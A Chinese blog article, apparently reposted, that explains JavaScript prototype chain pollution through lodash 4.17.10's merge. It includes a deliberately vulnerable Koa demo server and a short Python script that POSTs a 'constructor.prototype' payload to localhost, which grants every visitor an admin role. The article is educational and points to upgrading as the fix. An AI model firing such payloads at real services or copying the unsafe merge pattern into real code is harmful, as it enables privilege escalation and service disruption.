当前位置:   article > 正文

用前端原型链漏洞污染拿下了服务器

lodash库 4.17.10漏洞

大厂技术  高级前端  Node进阶

点击上方 程序员成长指北,关注公众号

回复1,加入高级Node交流群

作为前端开发者,某天偶然遇到了原型链污染漏洞,原本以为没有什么影响,好奇心驱使下,抽丝剥茧,发现原型链污染漏洞竟然也可以拿下服务器的shell管理权限,不可不留意!

某天正奋力的coding,机器人给发了这样一条消息

3f3ae5247689ec73e9ad59d2aa0c6ed1.png

查看发现是一个叫“原型链污染”(Prototype chain pollution)的漏洞,还好这只是 dev 依赖,当前功能下几乎没什么影响,其修复方式可以通过升级包版本即可。

a522243a267a345d3676940bfb19bb27.png

“原型链污染”漏洞,看起来好高大上的名字,和“互联网黑话”有得一拼,好奇心驱使下,抽丝剥茧地研究一番。

目前该漏洞影响了框架常用的有:

  • Lodash <= 4.15.11

  • Jquery < 3.4.0

  • ...

0x00 同学实现一下对象的合并?

面试官让被面试的同学写个对象合并,该同学一听这问题,就这,就这,30s就写好了一份利用递归实现的对象合并,代码如下:

  1. function merge(target, source) {
  2.     for (let key in source) {
  3.         if (key in source && key in target) {
  4.             merge(target[key], source[key])
  5.         } else {
  6.             target[key] = source[key]
  7.         }
  8.     }
  9. }

可是面试的同学不知道,他实现的代码,会埋下一个原型链污染的漏洞,大家下次面试新同学的时候,可以问问了

为啥会有原型链污染漏洞?

那么接下来,我们一起深入浅出地认识一下原型链漏洞,以便于在日常开发过程中就规避掉这些可能的风险。

0x01 JavaScript中的原型链

1.1 基本概念

在javaScript中,实例对象与原型之间的链接,叫做原型链。其基本思想是利用原型让一个引用类型继承另一个引用类型的属性和方法。然后层层递进,就构成了实例与原型的链条,这就是所谓原型链的基本概念。

三个名词:

  1. 隐式原型:所有引用类型(函数、数组、对象)都有 __proto__ 属性,例如arr.__proto__

  2. 显式原型:所有函数拥有prototype属性,例如:func.prototype

  3. 原型对象:拥有prototype属性的对象,在定义函数时被创建

原型链之间的关系可以参考图1.1:

566664d934c3cfb315b28bd886747129.png
图1.1 原型链关系图

1.2 原型链查找机制

当一个变量在调用某方法或属性时,如果当前变量并没有该方法或属性,就会在该变量所在的原型链中依次向上查找是否存在该方法或属性,如果有则调用,否则返回undefined

1.3 哪里会用到

在开发中,常常会用到 toString()valueOf()等方法,array类型的变量拥有更多的方法,例如forEach()map()includes()等等。例如声明了一个arr数组类型的变量,arr变量却可以调用如下图中并未定义的方法和属性。

bfdb12cac702f2cdc64b02277e628363.png

通过变量的隐式原型可以查看到,数组类型变量的原型中已经定义了这些方法。例如某变量的类型是Array,那么它就可以基于原型链查找机制,调用相应的方法或属性。

0adbf933f1bfd647725fcf70ffdc9a62.png

1.4 风险点分析&原型链污染漏洞原理

首先看一个简单的例子:

  1. var a = {name: 'dyboy', age: 18};
  2. a.__proto__.role = 'administrator'
  3. var b = {}
  4. b.role    // output: administrator

实际运行结果如下:

6e71591f37df66b2f92f871eeb93c692.png
运行结果

可以发现,给隐式原型增加了一个role的属性,并且赋值为administrator(管理员)。在实例化一个新对象b的时候,虽然没有role属性,但是通过原型链可以读取到通过对象a在原型链上赋值的‘administrator’。

问题就来了,__proto__指向的原型对象是可读可写的,如果通过某些操作(常见于mergeclone等方法),使得黑客可以增、删、改原型链上的方法或属性,那么程序就可能会因原型链污染而受到DOS、越权等攻击

0x02 Demo演示 & 组合拳

2.1 Demo演示

Demo使用koa2来实现的服务端:

  1. const Koa = require("koa");
  2. const bodyParser = require("koa-bodyparser");
  3. const _ = require("lodash");
  4. const app = new Koa();
  5. app.use(bodyParser());
  6. // 合并函数
  7. const combine = (payload = {}) => {
  8.   const prefixPayload = { nickname: "bytedanceer" };
  9.   // 用法可参考:https://lodash.com/docs/4.17.15#merge
  10.   _.merge(prefixPayload, payload);
  11.   // 另外其他也存在问题的函数:merge defaultsDeep mergeWith
  12. };
  13. app.use(async (ctx) => {
  14.   // 某业务场景下,合并了用户提交的payload
  15.   if(ctx.method === 'POST') {
  16.     combine(ctx.request.body);
  17.   }
  18.   // 某页面某处逻辑
  19.   const user = {
  20.     username: "visitor",
  21.   };
  22.   let welcomeText = "同学,游泳健身,了解一下?";
  23.   // 因user.role不存在,所以恒为假(false),其中代码不可能执行
  24.   if (user.role === "admin") {
  25.     welcomeText = "尊敬的VIP,您来啦!";
  26.   }
  27.   ctx.body = welcomeText;
  28. });
  29. app.listen(3001, () => {
  30.   console.log("Running: http://localohost:3001");
  31. });

当一个游客用户访问网址:http://127.0.0.1:3001/ 时,页面会显示“同学,游泳健身,了解一下?”

9fd3171a02473e83105cc9b678b13823.png

可以看到在代码中使用了loadsh(4.17.10版本)的merge()函数,将用户的payloadprefixPayload做了合并。

乍一看,似乎并没有什么问题,对于业务似乎也不会产生什么问题,无论用户访问什么都应该只会返回“同学,游泳健身,了解一下?”这句话,程序上user.role是一个恒为为undefined的条件,则永远不会执行if判断体中的代码。

然而使用特殊的payload测试,也就是运行一下我们的attack.py脚本

9adbf922791335cffe7274338cd67601.png

当我们再访问http://127.0.0.1:3001时,会发现返回的结果如下:

eee9ed925cf9e3ed2b1cf959d4e0f129.png

瞬间变成了健身房的VIP对吧,可以快乐白嫖了?此时,无论什么用户访问这个网址,返回的网页都会是显示如上结果,人人VIP时代。如果是咱写的代码在线上出现这问题,【事故通报】了解一下。

376a904ae8f0f0c40e0d57f5ff65a4d5.png

attact.py 的代码如下:

  1. import requests
  2. import json
  3. req = requests.Session()
  4. target_url = 'http://127.0.0.1:3001'
  5. headers = {'Content-type''application/json'}
  6. # payload = {"__proto__": {"role""admin"}}
  7. payload = {"constructor": {"prototype": {"role""admin"}}}
  8. res = req.post(target_url, data=json.dumps(payload),headers=headers)
  9. print('攻击完成!')

攻击代码中的payload:{"constructor": {"prototype": {"role": "admin"}}} 通过merge() 函数实现合并赋值,同时,由于payload设置了constructormerge时会给原型对象增加role属性,且默认值为admin,所以访问的用户变成了“VIP”

2.2 分析一下loadsh中merge函数的实现

分析的lodash版本4.17.10(感兴趣的同学可以拿到源码自己手动追溯

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/695835
推荐阅读
相关标签